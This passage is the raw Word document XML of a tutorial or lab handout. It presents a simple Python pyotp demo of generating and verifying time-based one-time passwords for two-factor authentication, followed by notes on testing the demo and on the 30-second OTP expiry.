    <w:p w14:paraId="4365D4D3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otp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A28017" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5918B93D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="36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(this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typically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done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server) def verify_otp(secret, otp):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24872C8F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:right="6526"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>totp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pyotp.TOTP(secret) if totp.verify(otp):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C523CB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:right="4861" w:firstLine="479"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>print("OTP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Verified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Successfully!") </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FB0547" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr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print("Invalid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OTP!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Verification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Failed.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A06493D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E3477D5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360" w:right="8078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function def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE61BF1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print("Two-Factor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(2FA)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2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Demo")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCAC63E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6123FC42" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="48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(this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would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 xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>client)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C91519C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="225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generate_secret()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF49B26" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BF0D39A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:right="78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(client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based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secret) otp = generate_otp(secret)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F289C6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="739C27B3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr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enters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(simulating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input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here) entered_otp = input("Enter the OTP: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ABF5C4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08002943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(server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verifies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entered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client) verify_otp(secret, entered_otp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093BA6A4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="226"/>
        <w:ind w:left="840" w:right="6526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 xml:space="preserve"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 xml:space="preserve">": </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50749700" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="196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23D1C866" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="61"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4201AC06" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="280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two_factor_auth.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55313A25" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:right="846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5C9080B8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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2EA70689" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58B27AA1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1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two_factor_auth.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5217498E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626DA8F9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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will:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F830E0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1799"/>
        </w:tabs>
        <w:spacing w:before="3"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Generate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secret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user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0377C1BE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1799"/>
        </w:tabs>
        <w:spacing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Generate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one-time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(OTP)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secret.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24504AA0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1799"/>
        </w:tabs>
        <w:spacing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Ask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4"/>
        </w:rPr>
        <w:t>OTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374BA33C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1799"/>
        </w:tabs>
        <w:spacing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Verify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entered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user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC1F6BB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="269" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri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35E25" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="7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lastRenderedPageBreak/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Testing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2FA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System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DF6ECE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24AACBF9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When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run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script,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secret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4"/>
        </w:rPr>
        <w:t>key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475FE1F4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generate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secret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4"/>
        </w:rPr>
        <w:t>key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446C26F5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ind w:right="953"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>You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asked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OTP.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matches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generated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be </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041F4C44" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="15"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FBD7637" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1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1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:color w:val="4F81BC"/>
        </w:rPr>
        <w:t>6:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:color w:val="4F81BC"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:color w:val="4F81BC"/>
        </w:rPr>
        <w:t>Expiry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of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5"/>
        </w:rPr>
        <w:t>OTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626CE795" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="57"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06FD2389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expires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seconds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default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window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TOTP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38490188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If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wait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before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entering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OTP,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invalid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5"/>
        </w:rPr>
        <w:t>it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CC922D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2EAAE7B" wp14:editId="203457B6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>297555</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6173470" cy="2095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1704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888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66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CA81E" id="Group 94" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:23.45pt;width:486.1pt;height:1.65pt;z-index:-15720960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&#10;">
                <v:shape id="Graphic 95" o:spid="_x0000_s1027" style="position:absolute;width:61722;height:203;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6172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31txAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/NbsIw&#10;EITvSH0HaytxK04poDbFoKoIiSs/h/a2ibdJ2ngd4oWEt8dIlTiOZuYbzXzZu1qdqQ2VZwPPowQU&#10;ce5txYWBw3799AoqCLLF2jMZuFCA5eJhMMfU+o63dN5JoSKEQ4oGSpEm1TrkJTkMI98QR+/Htw4l&#10;yrbQtsUuwl2tx0ky0w4rjgslNvRZUv63OzkD2eRLWH777+2qq1fHYp0dX8aZMcPH/uMdlFAv9/B/&#10;e2MNvE3h9iX+AL24AgAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAGOXfW3EAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m6172200,l,,,20320r6172200,l6172200,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 96" o:spid="_x0000_s1028" style="position:absolute;left:6170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8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+QxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvgv8hPKE3zWqh6tYoKhTaQy1dy0Jvj83rZnHzsiSpbv99Iwgeh5n5hlltetuKM/nQOFYwnWQg&#10;iCunG64VfB1fxgsQISJrbB2Tgj8KsFkPByvMtbvwJ52LWIsE4ZCjAhNjl0sZKkMWw8R1xMn7cd5i&#10;TNLXUnu8JLht5SzLnqTFhtOCwY72hqpT8WsVlN6b7cfhfUdvj913M8/K5S6USj2M+u0ziEh9vIdv&#10;7VetYDmH65f0A+T6HwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAB1635DEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m3048,3048l,3048,,16764r3048,l3048,3048xem6173152,r-3035,l6170117,3048r3035,l6173152,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 98" o:spid="_x0000_s1030" style="position:absolute;left:61704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6r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 99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6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jExQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PawJB&#10;DMXvgt9hSMGL1FmlaNk6iiiC0It/aY9hJ91dupMZdkZdv31zKHh7IS+/vDdfdq5RN2pj7dnAeJSB&#10;Ii68rbk0cD5tX99BxYRssfFMBh4UYbno9+aYW3/nA92OqVQC4ZijgSqlkGsdi4ocxpEPxLL78a3D&#10;JGNbatviXeCu0ZMsm2qHNcuHCgOtKyp+j1cnlGlY125yCdfz/m3/9dh+DjffM2MGL93qA1SiLj3N&#10;/9c7K/EziS9lRIFe/AEAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAAn0jExQAAANw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10A509" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="21"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B981832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04E50C69" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6219CE3E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script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generate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secret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5"/>
        </w:rPr>
        <w:t>it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1309FFE9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OTP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expire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after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30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AB49E4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:right="101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prompted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 input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OTP,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OTP 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valid,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authenticated </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233E64CE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1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315AF58" wp14:editId="41F48EB9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>295364</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6173470" cy="2032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1704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520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1704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7284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550EC" id="Group 101" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:23.25pt;width:486.1pt;height:1.6pt;z-index:-15720448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&#10;BwAAAAA=&#10;">
